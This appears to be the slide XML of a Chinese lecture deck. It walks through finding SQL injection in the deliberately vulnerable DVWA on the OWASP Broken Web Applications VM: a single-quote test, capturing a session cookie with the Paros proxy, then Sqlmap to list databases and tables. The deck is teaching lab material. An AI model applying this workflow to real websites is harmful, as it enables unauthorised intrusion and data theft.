          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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开放式</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应用程序安全项目</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(Open Web Application Security Project, OWASP)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是世界上最知名的</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安全与数据库安全研究组织，该组织分别在</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2007</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2010</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年和</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2013</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年统计过十大</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安全漏洞。我们基于</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OWASP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发布的开源虚拟镜像“</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OWASP Broken Web Applications VM”</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来演示如何寻找</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注入漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197FFAF6-64D3-46AB-A604-47726C0E19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0" y="3621509"/>
            <a:ext cx="5086350" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3159831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100783" y="1600101"/>
            <a:ext cx="10657184" cy="1417840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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首先，在虚拟机加载该虚拟映像。启动该虚拟机后将显示其</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地址，在本机浏览器打开该地址即可访问，如下图所示，我们选择</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Damn Vulnerable Web Application</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，通过用户名</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user</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密码</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user</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登录，选择</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 Injection</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。同时，将网页左下端的</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DVWA Security</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设置为</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low</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312515" y="3400301"/>
            <a:ext cx="10233720" cy="2732564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2426803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1388815" y="2896245"/>
            <a:ext cx="10441160" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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a:t>
            </a:r>
            <a:r>
              <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SQL</a:t>
            </a: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注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31743946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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1FA02D-4647-4B1D-AB3D-4EEA2D122994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316807" y="3904357"/>
            <a:ext cx="10657184" cy="1879313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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接下来判断是否能够进行注入，通过“单引号”法进行测试，在提交栏里输入一个单引号，发现报错，错误信息为：</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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1</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，初步认定可以注入。</a:t>
            </a:r>
          </a:p>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接下来，我们通过</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Sqlmap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进行自动化注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="1672109"/>
            <a:ext cx="11161240" cy="1620890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371015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100783" y="4624437"/>
            <a:ext cx="10657184" cy="1417840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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意味着，要能访问</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sqli</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页面，需要通过</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login.php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优先登录，登录后才可以访问。因此，需要获取登录权限才可以。但假定我们难以猜测得到用户口令和密码，但我们可以</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想办法获取其</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值，实现会话劫持。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4262ECA-85D5-47D2-946A-8BC1DAFDF6B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2468935" y="447973"/>
            <a:ext cx="7596845" cy="3816424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177760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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="808013"/>
            <a:ext cx="4068452"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4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打开本地代理服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D7774A-E028-44CC-89F4-D1ED1A50EF75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676847" y="1744117"/>
            <a:ext cx="8784976" cy="4119259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0485F997-9B2A-4B7A-98B4-B62668E2A10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85759" y="4308374"/>
            <a:ext cx="2592158" cy="2511657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294097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par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="2" presetClass="entr" presetSubtype="2" decel="60000"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1+#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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="916675"/>
            <a:ext cx="2088232"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400" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>设置代理：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D7774A-E028-44CC-89F4-D1ED1A50EF7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64879" y="1744117"/>
            <a:ext cx="8421886" cy="4536504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137B9FC4-5BF6-49C8-AA1F-DB2A48C1D7D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85759" y="4308374"/>
            <a:ext cx="2592158" cy="2511657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205218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par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1208794" y="880021"/>
            <a:ext cx="10441160"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4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在网页的输入框中，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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，选择提交后，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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拦截到的数据包信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D7774A-E028-44CC-89F4-D1ED1A50EF7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80903" y="1744117"/>
            <a:ext cx="8308618" cy="4320480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2736A3CC-CF8F-4DDB-8EC6-594CC202BE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85759" y="4308374"/>
            <a:ext cx="2592158" cy="2511657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434973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par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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1+#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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424819" y="1225986"/>
            <a:ext cx="10009112" cy="652474"/>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http://192.168.32.134/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="20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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424819" y="641849"/>
            <a:ext cx="2990900"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记录其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">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0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0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信息</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0"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3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D122C51F-C504-4D8C-82DC-C91EC14A3CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3044999" y="2614069"/>
            <a:ext cx="6480720" cy="4302584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662E4D72-C209-42E8-AD95-8ED88C8E4544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="2072656"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306901BC-BC35-4EA9-AD6E-35E643B412D6}"/>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FD8F04A5-6DAC-477F-B62C-42BEB1D2B714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5721489" y="837929"/>
              <a:ext cx="1415772"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判定注入</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB5D436-7EAB-4280-8B1E-7FB4978825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999039">
            <a:off x="9708651" y="3943273"/>
            <a:ext cx="2673277" cy="2673277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2073013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6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par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="2" decel="60000" fill="hold" nodeType="after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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25"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A6D266F0-4189-4808-97FC-0E1C1BE6214D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244799" y="1032567"/>
            <a:ext cx="10229238" cy="1660434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{800C65A2-D7DD-41FD-A6A7-7BDD84F04ADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1028775" y="3718875"/>
            <a:ext cx="11021604" cy="971727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD40378-7C2A-4D51-9F34-58077B2BE466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1061735" y="5008377"/>
            <a:ext cx="11475398" cy="958549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669377B6-1F1E-4587-B372-D86DE4BC5CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="2984102"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523B8BFE-7377-4418-AAEE-C1054F169F6A}"/>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9B7E8BC9-8718-4D9E-81BB-36243CAED864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5567601" y="837929"/>
              <a:ext cx="1723549"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列举数据库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3716150-5227-4747-86E2-A34CD7FE07D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999039">
            <a:off x="9780661" y="4007878"/>
            <a:ext cx="2673277" cy="2673277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2441290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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="16" presetClass="entr" presetSubtype="37"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outVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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1+#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669377B6-1F1E-4587-B372-D86DE4BC5CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5202512" y="847355"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523B8BFE-7377-4418-AAEE-C1054F169F6A}"/>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9B7E8BC9-8718-4D9E-81BB-36243CAED864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5875377" y="837929"/>
              <a:ext cx="1107996"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列举表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E90471-B083-451C-AC05-102D4069D0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1058702" y="1496843"/>
            <a:ext cx="11159441" cy="1183377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
